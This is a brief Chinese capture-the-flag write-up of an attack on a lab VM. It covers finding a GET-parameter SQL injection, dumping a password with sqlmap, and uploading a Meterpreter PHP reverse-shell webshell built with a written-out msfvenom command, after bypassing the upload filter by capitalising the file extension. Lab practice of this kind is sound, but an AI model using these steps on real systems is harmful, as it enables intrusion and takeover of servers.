CTF—攻防練習之HTTP—SQl注入(get)


攻擊機:192.168.32.152

靶機 :192.168.32.157

 

掃描靶機掃端口:

開放了ssh和80
看下ssh版本有沒有漏洞,searchsplot下,沒有發現

dirb掃描下目錄,有個admin的打開

進入到一個登錄界面,隨時試了幾個弱口令,不行

用掃描器吧,打開owasp zap掃一下

 

 

 

直接掃到了一個注入點  http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下

存在注入,那么直接,爆庫,爆字段,爆關鍵字,發現了password:

 

 

登進來了
找到一個上傳點

再制作一個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw 

上傳時發現文件名不能包含php,那就改成PHP即可

上傳成功后,再用msf監聽端口,拿到shell

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM